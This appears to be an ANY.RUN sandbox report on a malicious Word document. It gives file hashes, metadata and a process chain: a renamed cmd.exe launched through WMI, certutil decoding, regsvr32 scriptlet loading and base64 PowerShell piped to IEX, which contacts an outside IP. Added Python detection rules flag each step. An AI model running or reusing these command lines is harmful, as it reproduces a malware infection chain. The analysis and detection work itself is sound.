| Field | Value |
|---|---|
| File name | 487982bc6f4a82556f0ab3c219f55ae0.doc |
| Full analysis | https://app.any.run/tasks/94c5e646-cc74-4b45-9230-e658993a2ec5 |
| Verdict | Malicious activity |
| Analysis date | January 11, 2019, 06:44:48 |
| OS | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags | — |
| Indicators | — |
| MIME | application/msword |
| File info | Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: Administrator, Template: Normal.dotm, Last Saved By: Administrator, Revision Number: 2, Name of Creating Application: Microsoft Office Word, Total Editing Time: 01:00, Create Time/Date: Mon Jan 7 17:46:00 2019, Last Saved Time/Date: Mon Jan 7 17:46:00 2019, Number of Pages: 1, Number of Words: 11, Number of Characters: 61, Security: 0 |
| MD5 | 487982BC6F4A82556F0AB3C219F55AE0 |
| SHA1 | 0F90CC00C86536E51B8BDF6BD97F9302682B6718 |
| SHA256 | 471545026007C352F60C75355221CD13784ED3499DBD9EEB221FE7824ADE0842 |
| SSDEEP | 3072:SkMw3UGSBdXjjQsppr2HzxznvyXvcWNl:SekGSBdBpprgzxznqXvc |
| Extension | File type match | Score |
|---|---|---|
| .doc | Microsoft Word document | 54.2 |
| .doc | Microsoft Word document (old ver.) | 32.2 |
| Property | Value |
|---|---|
| CompObjUserType | Document Microsoft Word 97-2003 |
| CompObjUserTypeLen | 32 |
| HeadingPairs | — |
| TitleOfParts | — |
| HyperlinksChanged | No |
| SharedDoc | No |
| LinksUpToDate | No |
| ScaleCrop | No |
| AppVersion | 16 |
| CharCountWithSpaces | 71 |
| Paragraphs | 1 |
| Lines | 1 |
| Company | — |
| CodePage | Windows Latin 1 (Western European) |
| Security | None |
| Characters | 61 |
| Words | 11 |
| Pages | 1 |
| ModifyDate | 2019:01:07 17:46:00 |
| CreateDate | 2019:01:07 17:46:00 |
| TotalEditTime | 1.0 minutes |
| Software | Microsoft Office Word |
| RevisionNumber | 2 |
| LastModifiedBy | Administrator |
| Template | Normal.dotm |
| Comments | — |
| Keywords | — |
| Author | Administrator |
| Subject | — |
| Title | — |
| PID | Parent process | Command line | Path | Indicators | User | Integrity level | Version resource (description, company, version) | Exit code |
|---|---|---|---|---|---|---|---|---|
| 3216 | explorer.exe | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\487982bc6f4a82556f0ab3c219f55ae0.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | admin | MEDIUM | Microsoft Word, Microsoft Corporation, 14.0.6024.1000 | — |
| 3940 | wmiprvse.exe | C:\Users\admin\AppData\Local\msutil.exe /c %temp%\errors.bat | C:\Users\admin\AppData\Local\msutil.exe | — | admin | MEDIUM | Windows Command Processor, Microsoft Corporation, 6.1.7601.17514 (win7sp1_rtm.101119-1850) | 1 |
| 2680 | msutil.exe | REG ADD HKCU\Software\Microsoft\Notepad /v admin /t REG_SZ /d 3473 | C:\Windows\system32\reg.exe | — | admin | MEDIUM | Registry Console Tool, Microsoft Corporation, 6.1.7600.16385 (win7_rtm.090713-1255) | 0 |
| 3044 | msutil.exe | C:\Windows\system32\cmd.exe /c reg query "HKCU\Software\Microsoft\Notepad" /V admin | C:\Windows\system32\cmd.exe | — | admin | MEDIUM | Windows Command Processor, Microsoft Corporation, 6.1.7601.17514 (win7sp1_rtm.101119-1850) | 0 |
| 3280 | cmd.exe | reg query "HKCU\Software\Microsoft\Notepad" /V admin | C:\Windows\system32\reg.exe | — | admin | MEDIUM | Registry Console Tool, Microsoft Corporation, 6.1.7600.16385 (win7_rtm.090713-1255) | 0 |
| 3696 | msutil.exe | certutil -decode temp.txt C:\Users\admin\AppData\Roaming\3473.txt | C:\Windows\system32\certutil.exe | — | admin | MEDIUM | CertUtil.exe, Microsoft Corporation, 6.1.7600.16385 (win7_rtm.090713-1255) | 0 |
| 2544 | msutil.exe | regsvr32 /u /n /s /i:C:\Users\admin\AppData\Roaming\3473.txt scrobj.dll | C:\Windows\system32\regsvr32.exe | — | admin | MEDIUM | Microsoft(C) Register Server, Microsoft Corporation, 6.1.7600.16385 (win7_rtm.090713-1255) | — |
| 3980 | regsvr32.exe | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -W 1 -C [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('<base64 string elided>')) \| IEX | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | admin | MEDIUM | Windows PowerShell, Microsoft Corporation, 6.1.7600.16385 (win7_rtm.090713-1255) | — |
| 3836 | wmiprvse.exe | C:\Users\admin\AppData\Local\msutil.exe /c %temp%\errors.bat | C:\Users\admin\AppData\Local\msutil.exe | — | admin | MEDIUM | Windows Command Processor, Microsoft Corporation, 6.1.7601.17514 (win7sp1_rtm.101119-1850) | — |
| 2524 | msutil.exe | REG ADD HKCU\Software\Microsoft\Notepad /v admin /t REG_SZ /d 3515 | C:\Windows\system32\reg.exe | — | admin | MEDIUM | Registry Console Tool, Microsoft Corporation, 6.1.7600.16385 (win7_rtm.090713-1255) | — |
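The process rows above show a chain of built-in Windows tools rather than a dropped payload binary. WINWORD.EXE has no child processes; msutil.exe, whose version resource reads "Windows Command Processor" 6.1.7601.17514 (consistent with a renamed copy of cmd.exe), is started by wmiprvse.exe, so the launch went through WMI and does not appear as a child of Word. msutil.exe then runs certutil -decode to reconstruct 3473.txt, hands that file to regsvr32 /i: with scrobj.dll, and the scriptlet spawns PowerShell that base64-decodes a command and pipes it to IEX. The script below is an added example, not ANY.RUN output or part of this report: it runs a few detection rules over records constructed from those rows and correlates certutil's output path with the later regsvr32 target. The description-to-filename map is an illustrative assumption, and the base64 argument in the PowerShell record is a placeholder because the real one is not reproduced on this page.

```python
"""Detection rules for the LOLBin chain in the process table (added example, constructed input)."""
import re
from dataclasses import dataclass


@dataclass
class Proc:
    pid: int
    parent: str       # parent image name, as the report lists it
    image: str        # full path of the executable
    cmd: str          # command line
    description: str  # FileDescription from the binary's version resource


# Constructed from the process rows on this page (first run only). The base64
# argument in the PowerShell record is a placeholder; the real one is not on the page.
EVENTS = [
    Proc(3216, "explorer.exe", r"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE",
         r'"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n '
         r'"C:\Users\admin\AppData\Local\Temp\487982bc6f4a82556f0ab3c219f55ae0.doc"',
         "Microsoft Word"),
    Proc(3940, "wmiprvse.exe", r"C:\Users\admin\AppData\Local\msutil.exe",
         r"C:\Users\admin\AppData\Local\msutil.exe /c %temp%\errors.bat",
         "Windows Command Processor"),
    Proc(2680, "msutil.exe", r"C:\Windows\system32\reg.exe",
         r"REG ADD HKCU\Software\Microsoft\Notepad /v admin /t REG_SZ /d 3473",
         "Registry Console Tool"),
    Proc(3696, "msutil.exe", r"C:\Windows\system32\certutil.exe",
         r"certutil -decode temp.txt C:\Users\admin\AppData\Roaming\3473.txt", "CertUtil.exe"),
    Proc(2544, "msutil.exe", r"C:\Windows\system32\regsvr32.exe",
         r"regsvr32 /u /n /s /i:C:\Users\admin\AppData\Roaming\3473.txt scrobj.dll",
         "Microsoft(C) Register Server"),
    Proc(3980, "regsvr32.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
         r"powershell.exe -W 1 -C [System.Text.Encoding]::ASCII.GetString("
         r"[System.Convert]::FromBase64String('QUJD')) | IEX", "Windows PowerShell"),
]

# FileDescription -> the file name that binary normally carries. Illustrative
# assumption for this example; build the real map from a known-good image.
EXPECTED_NAME = {
    "windows command processor": "cmd.exe",
    "registry console tool": "reg.exe",
    "windows powershell": "powershell.exe",
}
USER_WRITABLE = re.compile(r"\\Users\\[^\\]+\\AppData\\", re.I)


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def rule_renamed_binary(p):
    # A system binary copied under a new name keeps its original version resource.
    expected = EXPECTED_NAME.get(p.description.lower())
    if expected and image_name(p.image) != expected:
        return f"{image_name(p.image)} carries the version resource of {expected}"


def rule_wmi_spawn_from_user_dir(p):
    # Win32_Process.Create from a macro makes wmiprvse.exe the parent, not WINWORD.EXE.
    if p.parent.lower() == "wmiprvse.exe" and USER_WRITABLE.search(p.image):
        return "started by WMI from a user-writable directory (no Office parent)"


def rule_certutil_decode(p):
    if image_name(p.image) == "certutil.exe" and re.search(r"\s-decode(hex)?\s", p.cmd, re.I):
        return "certutil used to decode a payload"


def rule_regsvr32_scriptlet(p):
    if image_name(p.image) == "regsvr32.exe" and re.search(r"/i:\S+", p.cmd, re.I) \
            and "scrobj.dll" in p.cmd.lower():
        return "regsvr32 scriptlet execution through scrobj.dll"


def rule_encoded_powershell(p):
    if image_name(p.image) == "powershell.exe" and "frombase64string" in p.cmd.lower() \
            and re.search(r"\b(IEX|Invoke-Expression)\b", p.cmd, re.I):
        return "PowerShell decodes a base64 command and evaluates it"


RULES = [rule_renamed_binary, rule_wmi_spawn_from_user_dir, rule_certutil_decode,
         rule_regsvr32_scriptlet, rule_encoded_powershell]


def scan(events):
    """Map pid -> list of findings for every process that trips at least one rule."""
    hits = {}
    for p in events:
        findings = [msg for msg in (rule(p) for rule in RULES) if msg]
        if findings:
            hits[p.pid] = findings
    return hits


def decode_then_execute(events):
    """Pair each certutil -decode output file with a later regsvr32 /i: that loads it."""
    decoded = {}
    for p in events:
        if image_name(p.image) == "certutil.exe":
            m = re.search(r"-decode(?:hex)?\s+\S+\s+(\S+)", p.cmd, re.I)
            if m:
                decoded[m.group(1).lower()] = p.pid
    pairs = []
    for p in events:
        if image_name(p.image) == "regsvr32.exe":
            m = re.search(r"/i:(\S+)", p.cmd, re.I)
            if m and m.group(1).lower() in decoded:
                pairs.append((decoded[m.group(1).lower()], p.pid, m.group(1)))
    return pairs


if __name__ == "__main__":
    for pid, findings in scan(EVENTS).items():
        print(pid, "; ".join(findings))
    print("decode -> execute:", decode_then_execute(EVENTS))
```

Run against the constructed records, `scan` flags 3940 (renamed cmd.exe launched by WMI from AppData), 3696, 2544 and 3980, while WINWORD.EXE and the reg.exe rows pass; `decode_then_execute` ties the certutil output 3473.txt to the regsvr32 process that loaded it, which is the linkage a triage note on this sample needs.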
| PID | Process | Filename | Type | MD5 | SHA256 |
|---|---|---|---|---|---|
| 3216 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR5748.tmp.cvr | — | — | — |
| 3980 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\B85EM9QITLDTVOTZM4LZ.temp | — | — | — |
| 3216 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D1C13ED0.wmf | wmf | 88EE6104A3DE09AFFB4EDA6249796C87 | 3C6F00A8949FBA764545B19E9A7E335BAFE0CF2C3619AD125CA481EC205D60F0 |
| 3216 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | E440D8E6EDF168962957C33A74919A65 | 8482313FCE545467D1159622521F5F0653AE8B4BDCDDC73FFA822CABCF51F85C |
| 3216 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\2E6C7D4B.wmf | wmf | 1165E2A196D4AE5AA5659C0C00C9DCB2 | BA41C3AC81E10FC1F4150F2A2682BE77C9BD2DE483A69F8E23218AE97AEEB2A4 |
| 3216 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\E4B38E75.wmf | wmf | 35EE699D786ADA7E670BB3F78F24D9F3 | 89CF93346A431441CD5BC25E2B6F70096A7F4CCA6FC2DC089AEC0F6FB87B86C1 |
| 3216 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\~$7982bc6f4a82556f0ab3c219f55ae0.doc | pgc | A96C79EF2A3F77AFD19A134A4598F37F | A00CC2CFBF4A5B6BD9778E51A4E9AE756A3AA868F6EEB526CC7BE1C8CC5684FD |
| 3216 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | B96EA31D058925C6BD3AF4072F256386 | 2D41139497F816989E2213BBB0CD44F9DEAE48773240A965A24100C5E930F4D5 |
| 3940 | msutil.exe | C:\Users\admin\AppData\Local\Temp\temp.txt | text | 076458C13359B56EC7304751B5B4A353 | BD95B2FFD28EC103021563EE68AA1E031F07CDD15C6D3475B3743E7F8CA0E188 |
| 3980 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | 6073B6FC66D2E68644893344F6904E4A | 0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 |
| PID | Process | IP:port | Domain | ASN | Country | Reputation |
|---|---|---|---|---|---|---|
| 3980 | powershell.exe | 185.10.68.189:443 | — | Flokinet Ltd | SC | suspicious |